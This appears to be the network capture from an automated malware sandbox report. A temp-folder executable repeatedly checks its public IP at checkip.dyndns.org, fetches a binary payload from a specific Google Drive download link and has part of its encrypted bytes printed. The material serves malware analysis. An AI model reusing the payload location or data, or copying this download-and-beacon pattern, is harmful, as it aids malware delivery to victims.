Dec 2, 2024 16:15:08.233998060 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 15:15:07 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
Dec 2, 2024 16:15:08.253102064 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 2, 2024 16:15:08.971946001 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 15:15:08 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
Dec 2, 2024 16:15:11.173847914 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 2, 2024 16:15:11.668648958 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 15:15:11 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49778	132.226.8.169	80	7852	C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 16:15:13.562160969 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 2, 2024 16:15:15.057388067 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 15:15:14 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49785	132.226.8.169	80	7852	C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 16:15:16.914670944 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 2, 2024 16:15:18.656021118 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 15:15:18 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49795	132.226.8.169	80	7852	C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 16:15:20.533407927 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 2, 2024 16:15:22.028032064 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 15:15:21 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49802	132.226.8.169	80	7852	C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 16:15:23.938836098 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 2, 2024 16:15:25.412378073 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 15:15:25 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49813	132.226.8.169	80	7852	C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 16:15:27.322514057 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 2, 2024 16:15:29.767723083 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 15:15:29 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49822	132.226.8.169	80	7852	C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 16:15:31.848694086 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 2, 2024 16:15:33.322443008 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 15:15:33 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49829	132.226.8.169	80	7852	C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 16:15:35.268507004 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 2, 2024 16:15:36.781102896 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 15:15:36 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	172.217.19.174	443	7852	C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 15:14:54 UTC	216	OUT	GET /uc?export=download&id=1xd9Aulm45fNbhuAM5L24KkyqjHMxxd5C HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2024-12-02 15:14:55 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 02 Dec 2024 15:14:54 GMT Location: https://drive.usercontent.google.com/download?id=1xd9Aulm45fNbhuAM5L24KkyqjHMxxd5C&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-mXZBrVyeVh2-BaK0N_eZBQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	142.250.181.129	443	7852	C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 15:14:57 UTC	258	OUT	GET /download?id=1xd9Aulm45fNbhuAM5L24KkyqjHMxxd5C&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-12-02 15:15:00 UTC	4922	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="mfKPHMLsurFUxt31.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 277056 Last-Modified: Mon, 02 Dec 2024 10:39:38 GMT X-GUploader-UploadID: AFiumC5wWJhJqsi7uneTxV_dcPYzaU3uUui8PgMfWO0s_8bAizJGTeVZRxgwwqMJapjlUlGCFT6DugyAvQ Date: Mon, 02 Dec 2024 15:14:59 GMT Expires: Mon, 02 Dec 2024 15:14:59 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=zAsH4Q== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-02 15:15:00 UTC	4922	IN	Data Raw: f7 fa c0 e1 8f 28 8a 40 88 40 8e 93 b1 61 2d 20 3c 59 01 2f 1e d6 a2 f8 07 ba a2 db 4b 87 d4 09 a1 bc 5e 42 65 95 19 96 d0 ec 56 4e 57 ab af f8 57 a0 82 d1 f4 b4 09 c5 2a 90 2b d2 68 67 f0 46 f9 7a 23 b4 8b 4c 79 01 fe 55 c1 4f 2a e2 f2 de a3 97 52 19 f6 38 82 cd 81 45 6c 0e c0 46 b0 91 ac b7 ee ff 5c 1a 50 89 2d df 50 82 ab 75 72 84 fc ba bb b3 d9 65 27 50 6f c7 3c 3f a4 bd 5c 94 80 47 51 3b 16 ef e8 bd 00 56 7e 56 40 39 ac 53 66 74 a7 3d f0 1c 3b e3 b1 f4 c7 5b 25 da d5 92 60 c7 f0 45 63 ff 5b 3c 3c 36 85 df 98 7b cf 84 94 5e 3d b8 93 84 80 34 d0 c8 cc 1f b2 73 b1 33 76 5a 77 c1 c2 b8 bb 6f 54 d7 66 49 1e ad 42 47 f6 72 25 f5 7d 85 44 61 31 46 5c 95 67 35 bb ce 55 60 14 c7 49 2c 32 5a 7d 01 a2 9c d5 30 06 c2 ea 1f d8 42 31 64 6c 79 dd 1b 45 25 54 58 99 Data Ascii: (@@a- <Y/K^BeVNWW+hgFz#LyUOR8ElF\P-Pure'Po<?\GQ;V~V@9Sft=;[%`Ec[<<6{^=4s3vZwoTfIBGr%}Da1F\g5U`I,2Z}0B1dlyE%TX
2024-12-02 15:15:00 UTC	4853	IN	Data Raw: 57 cd 1e c4 b5 92 b5 11 4b 59 47 1c 3d b8 a5 cf 24 19 ca 8b 47 42 c6 7d 25 14 8d 72 1b 38 4e 69 d6 f9 08 42 43 e5 b5 27 c0 d7 d6 bd c0 08 01 16 13 36 95 36 ff fd 24 65 1a 11 df 46 d7 a4 5c 8c cd 49 eb 25 ae 7a 21 a6 15 79 83 d5 e6 7c 3f d7 72 03 60 d6 a8 ab 79 6d b4 cc 3b 26 f9 e2 76 f9 0a 62 55 cd b9 4b 77 87 29 08 86 6b 9c 8d 73 85 f4 c2 cc 9e 72 2b 6f b6 36 e0 e3 22 72 f3 0b 35 ac c5 99 79 3a e1 e2 e9 36 8a 5e 5a d5 49 56 11 8c bb ec 17 26 40 70 37 f7 46 40 19 12 f9 9e 39 16 1a 4b 23 e3 a5 ae 36 75 73 ad b9 28 2b 87 bf 02 68 db 64 2d 2b 11 b7 2c 59 8f 71 6c ae d4 e2 9a da d4 3f b5 60 40 69 32 da cb b0 d8 ef dc 23 66 f6 80 33 7e 20 e1 05 16 ec eb 84 ff ec ad 9f c7 08 58 9b ae b8 b5 ff eb 60 b3 4c 5c 24 72 2d 60 81 ac 0e 1a 4f 30 de a0 c7 22 17 fe 3e 04 Data Ascii: WKYG=$GB}%r8NiBC'66$eF\I%z!y\|?r`ym;&vbUKw)ksr+o6"r5y:6^ZIV&@p7F@9K#6us(+hd-+,Yql?`@i2#f3~ X`L\$r-`O0">
2024-12-02 15:15:00 UTC	1324	IN	Data Raw: e2 74 5e a1 28 3f a2 66 64 53 38 76 ff 00 aa 9e 6c f3 4a 29 92 45 06 b0 a4 08 f9 b4 d8 0e 53 09 9b 7f 88 89 7c 40 40 f0 f6 ba c2 ca 35 2c 9f 8c 47 cf ac a9 a6 18 4b 90 32 a5 71 62 6c 22 08 a7 7c e5 3c 8d 62 8d 3b 9f c8 f5 67 21 f4 95 ef bf 3d 33 75 20 b3 be 88 3f bb 01 fa 5f d2 47 c4 15 8c e4 1b 97 56 6a 35 38 82 c7 ae 81 6c 0e ca 46 a1 99 c3 72 ee ff 56 64 6d 89 2d db 3f 44 ab 75 78 84 ed b2 c9 66 d6 65 57 78 db c7 3c 35 56 56 53 94 fe 70 b0 35 16 51 8e b7 21 ee 75 1a 9c 10 e5 b6 4f 07 87 4c a7 65 2e 3e de 99 97 9a 61 a3 93 49 14 e7 98 82 66 95 5c 9b 12 5f 9b 5d f9 2d e2 9c f9 31 5d 7f 98 93 ff d3 fa c8 bc bd 97 68 cf 19 26 1f 73 63 ab a5 ca 94 83 52 86 8d 36 d8 42 47 fc 1d ed f5 9d 8f 46 1e 06 47 0c 91 14 d8 bf ce 5f 67 1d b9 78 2c 32 5e a1 20 a4 9c a5 Data Ascii: t^(?fdS8vlJ)ES\|@@5,GK2qbl"\|<b;g!=3u ?_GVj58lFrVdm-?DuxfeWx<5VVSp5Q!uOLe.>aIf\_]-1]h&scR6BGFG_gx,2^
2024-12-02 15:15:00 UTC	1390	IN	Data Raw: 4d 26 83 51 b9 37 d3 13 e1 fe 5d 65 8b be d9 4f c4 b6 5b d5 b5 4f 48 46 32 dd fe 49 e6 c9 49 fe de a1 f7 bd 2f bd ab cd b6 0c 58 a6 93 fa d4 69 63 80 b3 0a 87 e0 45 d7 a1 75 99 a3 90 2c 7a 95 16 b3 cc 1f 43 a6 e7 f3 82 72 1c f2 5b 4c ab 85 c3 81 71 4c e7 38 76 8b 90 8f 86 1a 48 27 2b e2 97 35 81 5b 30 f9 be ca 52 77 00 ef 45 8d b0 cf e0 68 85 88 95 c8 d9 13 48 86 f8 47 bf b0 81 07 18 47 9a 24 73 07 71 6b 39 0f 9e 32 db 3c 8d 66 88 e4 eb a8 e7 67 57 f9 4a ef bf 33 33 fd 20 b3 be 99 6e 07 41 fa 55 c5 67 eb 1d f2 d8 1b 49 42 3c de 0c 82 cd cb 56 4f 0e e8 24 b0 91 a6 69 ee ff 5c 1a 2e be 2d df 54 f0 c8 77 72 f4 ea 92 3a b3 d9 6f 31 ae 6e d4 18 2e 00 91 00 89 03 18 eb 35 17 7e f7 02 8e e0 7f 6a 2f 3d ef 13 bb 07 87 47 20 56 44 e3 19 97 e7 48 e6 91 a2 83 2c e7 Data Ascii: M&Q7]eO[OHF2II/XicEu,zCr[LqL8vH'+5[0RwEhHGG$sqk92<fgWJ33 nAUgIB<VO$i\.-Twr:o1n.5~j/=G VDH,
2024-12-02 15:15:00 UTC	1390	IN	Data Raw: 3e 0f b2 6a dc cb c4 6e 44 51 3b e4 5f b9 4d 71 48 dd d6 e9 61 f8 59 7b 6a d6 d7 95 ca b3 50 3b 63 2b a9 d7 4e 89 1e eb db ce d3 64 8f 2f cd 0d 9b 64 72 72 ac 80 f6 08 7d 7f f2 4c 76 e4 92 e7 8f c2 5d 18 a9 ff 7a 6c 6b 1d b3 e4 15 c7 ca eb e2 8b 40 65 4a 74 5e a1 f5 61 8f 6d 64 42 30 60 ee f8 aa 9e 62 81 29 3a 9a 4b 2e 98 25 0c d1 75 ce f0 58 75 51 6e 8e ba bf 53 48 8e b2 95 c2 ce 4f 65 ae 8e 43 cc 06 81 27 12 24 57 24 5b 7a 71 7a 3b 1e 98 23 2a 3c 8d 68 99 d4 9f 9a 3a 67 27 8d 55 c7 db 37 1b b2 20 6d a4 ad 64 4d 01 fa 5f d2 45 d5 35 90 de 1b 9d 8c 19 f6 38 82 b3 f4 45 6c 0a b2 25 b2 91 dc a1 c6 7e 5c 1a 5a 9f d3 de 43 89 ba 7e 4b 4f fd ba bb cd f2 65 27 54 47 2c 3c 3f 2e ae 50 ea b8 58 eb 31 64 36 f1 70 51 f8 57 9b 8d 18 f2 2d f1 06 94 40 93 7e 65 48 d0 Data Ascii: >jnDQ;_MqHaY{jP;c+Nd/drr}Lv]zlk@eJt^amdB0`b):K.%uXuQnSHOeC'$W$[zqz;#*<h:g'U7 mdM_E58El%~\ZC~KOe'TG,<?.PX1d6pQW-@~eH
2024-12-02 15:15:00 UTC	1390	IN	Data Raw: e5 80 89 84 00 b6 f1 2f 08 11 37 33 1a 7e e9 a7 90 47 51 52 15 fd be 47 71 48 c5 d6 e9 61 f9 d7 79 6a ac d2 ba 5a b5 3f e0 75 d5 a2 cd 4e df e9 ea db c4 c7 ca e6 2f cd 08 c0 80 72 72 ac e1 73 79 4c 0f e5 c5 07 87 90 e6 da c2 0b dd a9 ff 74 52 91 1c a0 eb 6b 77 e6 e7 f9 f1 34 1e 80 04 76 f0 f5 61 ae 18 2f 53 38 72 a9 78 aa 9e 62 ff 36 2b 92 31 38 d2 25 08 f3 1c da e4 46 32 27 6e 8e ba cb c1 40 f0 89 99 c2 c2 43 95 a1 8e 37 d0 01 81 27 12 4b 92 5a 19 70 71 6f 4d 4c 9e 4c e0 4f 31 62 99 cf f6 48 f5 67 2d 87 7d b5 bf 37 11 a9 ad f3 b4 88 4d 5c 17 88 02 d5 4f a5 bf d7 c9 33 23 52 19 fc 9a a7 d5 b3 8c 62 0e b0 e4 95 88 d2 8f ee ff 58 b8 75 93 5f 32 5e 82 db d7 57 9f 82 a6 bb b3 dd 0a c9 50 6f cd 9e 1a 38 cf df 87 8e 28 49 1d 63 5b e1 7a 4e b2 7f 1a 87 15 f0 32 Data Ascii: /73~GQRGqHayjZ?uN/rrsyLtRkw4va/S8rxb6+18%F2'n@C7'KZpqoMLLO1bHg-}7M\O3#RbXu_2^WPo8(Ic[zN2
2024-12-02 15:15:00 UTC	1390	IN	Data Raw: 22 fb 8c b2 3d fd 8b 5c 9e a1 80 89 84 72 fd eb 40 a3 07 1f b8 1a 7e db 72 6e 44 5b 54 2c 49 91 31 71 36 fc d6 c9 65 87 b4 7b 42 ab c4 92 d1 b5 23 67 23 2b a3 c7 6c f0 bf e3 d0 c4 a3 32 f2 2f cd 0f 4a 88 65 0c e3 93 fe 72 ee 5a ea 3a 23 96 90 97 d7 94 75 99 af 5d 55 63 eb 5a a0 ed 00 6c c3 fd 81 d0 46 0a f0 d6 7b b0 ee ec e4 66 64 52 1d 60 f3 e7 a5 9e 18 23 0c 3c ba 81 10 98 2f aa dc a6 bc 3d 46 1a ed cc ab a9 97 f6 40 f0 82 37 e7 d0 43 f1 bf 8e 37 1d 92 f4 27 18 41 38 0c 2e 70 71 61 20 11 ec 59 f1 3c fd 1c 86 c5 99 f1 dd 2e 27 87 5f 9d bc 25 1b c4 08 f1 b4 88 4a 68 1f eb 41 e9 0b d5 1d f4 de c6 16 53 19 f6 1d aa f9 c1 45 66 1d df 46 98 f3 ac b7 e4 21 5c 1a 50 89 2d a1 64 82 ab 71 00 e7 fe ba cb a5 f1 e4 27 50 65 d1 c2 3e 37 9d 4d b4 b7 8b eb 35 16 73 bb Data Ascii: "=\r@~rnD[T,I1q6e{B#g#+l2/JerZ:#u]UcZlF{fdR`#</=F@7C7'A8.pqa Y<.'_%JhASEfF!\P-dq'Pe>7M5s
2024-12-02 15:15:00 UTC	1390	IN	Data Raw: 49 35 3f 80 53 b9 8d 49 62 93 43 a9 9a 03 fd 9a 4c e2 0f 80 a1 ec 72 ec fa f2 1b 01 1f b2 1a 7e e3 cf 5c 44 5b 50 5e 3c bb 47 01 20 de 57 e9 65 81 a2 85 6b cf c1 83 de 8c f5 e8 63 2b dd e9 49 e6 c9 99 ea c6 d3 6a a5 07 4c 09 e8 a7 64 8c a7 80 f8 67 4a 46 c2 49 04 87 90 f3 01 d2 48 99 a9 f9 03 ba 95 1c aa c5 c5 ce e6 ed f3 f0 95 0a 80 7e 4d ac e4 66 da 5c 64 53 3c 05 42 32 aa 94 07 45 29 2b 98 35 01 9f 4a cd f9 be c4 8e 6f 1a 9d 6a e1 76 bf 42 4a f0 99 92 b0 1f 3e 5e de a6 f3 bf ba 8b 55 f3 44 9a 54 73 2b 71 6b 39 60 59 4c e4 36 8d 73 9e d8 14 b5 f5 67 26 a2 43 9d c8 22 1b c4 82 96 a3 a0 f8 79 01 f0 f7 e4 57 a7 d4 fc de 6b 35 77 00 88 00 82 cd c5 e7 49 14 b2 6d b3 91 dc 15 cb e4 22 3a 50 89 29 7d 75 9e d9 f6 67 84 8c 18 93 c6 d9 65 2d 3f a7 c7 3c 35 24 c3 Data Ascii: I5?SIbCLr~\D[P^<G Wekc+IjLdgJFIH~Mf\dS<B2E)+5JojvBJ>^UDTs+qk9`YL6sg&C"yWk5wIm":P)}uge-?<5$
